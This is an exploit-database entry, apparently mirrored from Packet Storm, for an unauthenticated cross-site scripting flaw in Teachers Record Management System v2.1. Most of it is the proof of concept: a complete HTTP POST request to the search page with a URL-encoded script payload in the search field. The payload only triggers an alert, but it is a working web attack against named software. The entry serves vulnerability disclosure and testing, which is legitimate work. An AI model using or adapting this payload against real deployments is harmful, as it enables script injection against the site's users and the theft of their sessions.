Exploit for Teachers Record Management System 2.1 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:189572
# Exploit Title: Teachers Record Management System v2.1 |
    Unauthenticated Cross-Site Scripting (XSS)
    # Date: 2025-03-04
    # Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
    # Vendor: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
    # Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=10739
    # Tested on: Kali Linux
    # CVE: N/A
    
    PoC:
    
    There is an input field in index.php that searches by teacher or course
    name. When the XSS payload is entered, the attack is triggered.
    
    Request:
    
    ---------------------------------------
    ---------------------------------------
    ---------------------------------------
    POST /trms/search-result.php HTTP/1.1
    Host: 127.0.0.1
    Content-Length: 54
    Cache-Control: max-age=0
    sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://127.0.0.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://127.0.0.1/trms/index.php
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=374a618f65dd7c0040115178dbe3ed0e
    Connection: close
    
    searchinput=%3Cscript%3Ealert%281337%29%3C%2Fscript%3E
    
    ---------------------------------------
    ---------------------------------------
    ---------------------------------------